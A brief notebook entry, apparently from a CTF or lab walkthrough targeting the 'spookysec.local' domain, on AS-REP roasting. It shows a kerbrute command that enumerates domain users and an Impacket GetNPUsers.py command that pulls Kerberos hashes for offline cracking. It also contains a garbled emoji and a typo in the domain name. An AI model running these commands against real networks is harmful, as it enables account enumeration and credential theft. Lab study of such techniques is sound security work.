πŸ”₯Asreproasting

Kerbrute

kerbrute userenum --dc spookysec.local -d spookysec.local users.txt --downgrade

To get the hashes after verifying users: GetNPUsers.py:

GetNPUsers.py -dc-ip <ip> -usersfile users.txt spookysec.locald

Last updated